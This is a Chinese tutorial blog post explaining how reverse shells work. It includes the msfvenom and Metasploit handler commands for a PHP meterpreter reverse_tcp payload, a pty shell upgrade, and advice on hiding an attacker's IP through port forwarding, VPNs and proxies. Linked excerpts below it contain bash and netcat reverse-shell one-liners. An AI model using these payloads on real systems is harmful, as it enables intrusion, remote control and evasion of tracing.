端口代理反弹shell原理应用

最新推荐文章于 2024-07-10 14:06:03 发布
最新推荐文章于 2024-07-10 14:06:03 发布
阅读量446 收藏
点赞数
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39641273/article/details/131207600
版权

免责声明:本文章仅供安全从业人员,了解反弹shell的原理,技术讨论,不允许将其用于非法用途。

一、shell

shell是一种命令行解释程序,它允许用户与操作系统进行交互,并利用命令执行某些操作。简而言之,shell是一种命令行界面。可以理解为介于用户和系统内核的解释器,是用户直接调用内核的桥梁。

   

二、反弹shell原理

让受控主机A主动连接攻击者B(攻击者操控受控主机A主动连接攻击者本机B)监听在某TCP/UDP端口,受害端(目标服务器)发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转

1.攻击者在自己的机器B上打开一个监听端口(7777),等待目标机器A连接到该端口(7777);
2.攻击者在目标机器A上执行一个可执行文件或者命令,使得目标机器A能够连接到攻击者B的监听端口(7777);
3.目标机器A连接到攻击者B的监听端口,并在这个连接中打开一个远程命令行窗口(shell);
4.攻击者B就可以在自己的机器上操作目标机器A,执行命令,并获取返回结果。

三、反弹shell的应用场景

  • 交互繁琐
  • 不能直接连接目标主机
  • 目标主机ip地址会改变,不能随时进行连接
  • 由于防火墙等限制,对方机器只能发送请求,不能接收请求。
  • 对于对方环境的未知,不知道对方什么时候开机,dhcp动态分配ip地址,不知道何时中马,只能构造反弹shell,让对方主动连接我们。姜太公钓鱼愿者上钩

四、反弹shell的实现方法

  • 攻击者:kali
  • 受控主机:getshell普通用户权限主机

在kali上构造一个反弹shell,指定本机的IP地址(即监听地址),定义一个监听端口

-o指定输出文件的名称和格式,这里将生成一个名为msfshell.php的payload文件。

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.10.37 lport=7777 -o msfshell.php

我们利用msfconsole工具包下的use exploit/multi/handler工具

msfconsole
use exploit/multi/handler

查看设置

 这时候我们需要对监听的ip和端口,反向TCP Shell的payload进行设置

set lhost 192.168.10.37
set lport 7777
set payload php/meterpreter/reverse_tcp

 检查设置

执行run开始监听目标ip和端口

 

 这时候受控主机A从攻击者B下载攻击荷载文件,然后给予攻击荷载权限,让攻击者b去访问攻击荷载触发监听,获得反弹shell

攻击者假设服务器

操控受控主机下载攻击荷载到本地

给予权限

攻击机访问目标playload 

 当前 shell 转变为一个交互式终端

shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

四、总结

我们发现在实际的攻击过程中,使用常规反弹shell攻击者的计算机IP地址将被暴露给受害者计算机,因为攻击者需要将自己的计算机IP地址提供给受害者计算机以建立连接。当对方具备一定的抓包和溯源能力就能借此溯源到攻击者。因此,对方反弹shell攻击可能会危及攻击者的匿名性和安全。

这些技术可以用来隐藏攻击者的真实IP地址,从而增强攻击的匿名性和安全性。下面是一些常用的增强反弹shell匿名性的技术:

  1. 端口转发:攻击者可以使用端口转发技术将流量从受害者计算机转发到攻击者的计算机上,从而隐藏自己的真实IP地址。端口转发可以使用一些工具实现,例如socat、ssh、netcat等。

  2. VPN:攻击者可以使用VPN连接到互联网,从而隐藏自己的真实IP地址。VPN通过加密和隧道技术将流量从攻击者计算机传输到目标计算机上。

  3. 代理:攻击者可以使用代理服务器将流量从受害者计算机转发到攻击者的计算机上,从而隐藏自己的真实IP地址。代理服务器可以使用一些公开的代理服务或专门搭建的代理服务器。

参考文献:端口映射后的公网反弹shell_努力的学渣'#的博客-CSDN博客

贺越洋
关注
[网络安全自学篇] 七十九.Windows PE病毒原理、分类及感染方式详解
杨秀璋的专栏
05-20 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了XSS跨站脚本攻击案例,主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。基础性文章,希望对您有所帮助~
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
热门推荐
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
内网转发——反弹端口
cxrpty的博客
03-17 3904
反弹端口:是指受害者服务器的某一个端口不能访问,我们通过反弹端口的形式,让攻击者能够访问该端口,也叫端口转发 主要指以下情况: -1.访问服务器的3389端口,由于防火墙的原因,我们访问不了3389端口 原因:1.3389端口,防火墙没有开放 2.服务器处于公司内网,对外只发布了80端口 3.3389...
反弹端口原理与HTTP隧道技术
天元喜羊羊的博客
08-20 1555
http://blog.163.com/feiqiu_13/blog/static/16870088920108123110438/ 现在,很多木马都利用了“反弹端口原理”与“HTTP隧道技术”,它的服务端(被控制端)会主动连接客户端(控制 端),因此,在互联网上可以访问到局域网里通过NAT代理(透明代理)上网的电脑,可以穿过防火墙( 包括:包过滤型及代理型防火墙) ,并且支持所有的上网
阿一课代表今日分享之使用dnscat2 进行dns隧道反弹shell(直连模式linuxlinux
最新发布
qq_69775412的博客
07-10 975
Dns解析过程:系统发出dns解析之前会先看看本地是否保存了相关域名的解析,系统检测到hosts文件中没有响应的域名解析的时候会发送给本地dns解析服务器进行解析,解析之前会看看缓存中是否存在,如果没有,再将解析请求发给下一个dns服务器。gem install bundler 是一个在 Ruby 环境中使用的命令,用于安装 Bundler 这个 gem(gem 是 Ruby 的包管理器)Bundler 是一个帮助管理 Ruby 项目依赖的工具,它可以确保你的项目在不同的环境中使用相同版本的 gems。
远程控制编程之反弹端口模式
08-28 2424
 远程控制软件的上线模式主要有两种:正向直连模式与反弹端口模式。正向直连模式远控需要输入对方的IP地址和端口(图1),比如Radmin就是正向连接。当被控端是ADSL拨号这种动态IP或者需要监控的机器比较多的话,一个个输入IP和端口是繁琐和不准确的。这时,聪明的远程控制软件开发者们设计了反弹端口模式(图2),比如常见的灰鸽子,PcShare等远控都使用了这个模式。这个模式主要用于两个目的,一是解决
流量映射端口反弹
niqiu320的博客
05-26 871
实验1:LCX端口转发 正向转发 内网主机执行:lcx.exe –slave 公网主机IP 公网主机端口 内网主机IP 内网主机端口 外网主机执行:Lcx.exe –listen 公网主机端口1 公网主机端口2 反向转发 外网主机执行:Lcx.exe -tran 53 目标主机IP 3389 试验二:PORTMAP端口转发 正向转发 内网主机执行:./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666 外网主机执行:./por
反弹端口型木马
rongwenbin的专栏
04-25 4284
首先要知道反弹端口原理: 简单地说,就是由木马的服务端主动连接客户端所在IP对应的电脑的80端口。相信没有哪个防火墙会拦截这样的连接(因为它们一般认为这是用户在浏览网页),所以反弹端口型木马可以穿墙。 以下是在“网络神偷”的介绍中挖下来的:道高一尺、魔高一丈,不知哪位高人分析了防火墙的特性后发现:防火墙对于连入的连接往往会进行非常严格的过滤,但是对于连出的连接却疏于防范。于是,与一般的软件相
应用netcat实现端口转发
成长
01-23 2万+
找到工作后的第一篇blog---netcat实现端口转发
20194311姜晨昊Exp2-后门原理与实践
weixin_51927594的博客
03-28 1364
20194311姜晨昊Exp2-后门原理与实践 实验基础 本次实验需要我们掌握后门的基础知识,学习使用nc实现Windows,Linux之间的后门连接,学习使用Metaspolit的msfvenom指令生成简单的后门程序,学会MSF POST模块的应用。 基础知识 后门的概念 后门就是不经过正常认证流程而访问系统的通道。后门可能出现在编译器中、操作系统中,最常见的是应用程序中的后门,还可能是潜伏于操作系统中或伪装成特定应用的专用后门程序。 常用后门工具 NC和Netcat 底层工具,进行基本的
运维知识点-linux操作系统-linux命令行-BashShell
aming小老弟
11-17 697
Yum(全称为 Yellow dog Updater, Modified)是一个在Fedora和RedHat以及CentOS中的Shell前端软件包管理器。基于RPM包管理,能够从指定的1、显示已经安装的软件包2、查找可以安装的软件包 (以 tomcat 为例)3、安装软件包 (以 tomcat 为例)4、卸载软件包 (以 tomcat 为例)5、列出软件包的依赖 (以 tomcat 为例)6、-y 自动应答yes我们可以用 -y 来应答所有的 yes , 比如我们安装 tomcat 的时候,
端口复用/重用反弹shell
04-14
端口复用/重用反弹shell 可以利用系统已经开启的端口,如:139,445,1025等。
利用socket转发和反弹端口技术突破防火墙进入内
杨德龙的专栏
04-25 3841
 http://www.vfocus.net/art/index_f.htmlTCP端口反弹技术? 反弹技术,该技术解决了传统的远程控制软件不能访问装有防火墙和控制局域网内部的远程计算机的难题。反弹端口型软件的原理是,客户端首先登录到FTP服务器,编辑在木马软件中预先设置的主页空间上面的一个文件,并打开端口监听,等待服务端的连接,服务端定期用HTTP协议读取这个文件的内容,当发现是客户端让
反弹端口 HTTP代理 HTTP隧道技术
whatday的专栏
10-17 5788
现在,很多木马都利用了“反弹端口原理”与“HTTP隧道技术”,它的服务端(被控制端)会主动连接客户端(控制 端),因此,在互联网上可以访问到局域网里通过NAT代理(透明代理)上网的电脑,可以穿过防火墙( 包括:包过滤型及代理型防火墙) ,并且支持所有的上网方式,只要能浏览网页的电脑,这种木马都可以访问到,那么我们有必要了解一下此类木马用到的相关技术。      反弹端口原理:   
为什么要反弹shell
m0_55306747的博客
05-28 503
我也不知道这个比喻恰不恰当: 首先是一个城池,我想要控制这个城,就要控制这个城的城主,我手里有控制当前城主的把柄(shell) 但是我要和城主建立起联系才可以控制他,城外有一座大墙(防火墙),会严格检查入城的人(流量审查),所以我不能入城,一旦入城,城里的人可能会发现异样,将城主换掉(打补丁) 不过好在我发现这个城有一个后门,我虽然进不去,但是我把信送进去了,我不去找他,我让城主来找我,我在信上写了我的地址(ip和端口),然后我在预定的位置等待城主的到来(端口监听) 因为城主是城主出城,当然那个大墙
内网转发之反弹端口
broing55的博客
03-17 924
反弹端口实验 实验环境:windows 2008r2服务器 和 本机 实验步骤 win2008服务器开启防火墙,开启3389端口并不对外开放,利用reduh工具使其服务器将其他端口公用。 本地计算机关闭防火墙和杀毒软件,安装java环境和jdk服务 实验流程: 配置虚拟机环境,将远程控制打开 然后将reduh中的aspx文件上传到wwwroot下面 然后本机计算机访问一下...
linux 反弹端口,linux各种一句话反弹shell总结
weixin_39759989的博客
05-08 220
1nc开启本地监听发布bash服务1#nc-lvvp12345-t-e/bin/bash2常用反弹shell一句话(1)bash反弹一句话1#bash-i>&/dev/tcp/192.168.1.123/123450>&1(2)nc反弹一句话1#nc192.168.1.12312345-t-e/bin...
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 4776
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
端口反弹工具lcx代码
kimqcn的专栏
01-11 966
#include #include #include #pragma comment(lib, "ws2_32.lib")#define SERVERNAME "itrusPorter"#define VERSION "v1.2"#define MAXBUFSIZE 8192#define ADDRSIZE 32struct SOCKINFO{ SOCKET ClientSock;
Linux Bash反弹shell原理详解与操作过程
这篇文章详细解释了Linux中bash反弹shell技术的工作原理,包括如何利用特定命令建立网络连接、交互模式的开启、以及文件描述符在其中的作用。这对于理解和实施安全防御策略,或者学习逆向工程和渗透测试技术都是非常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

贺越洋

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值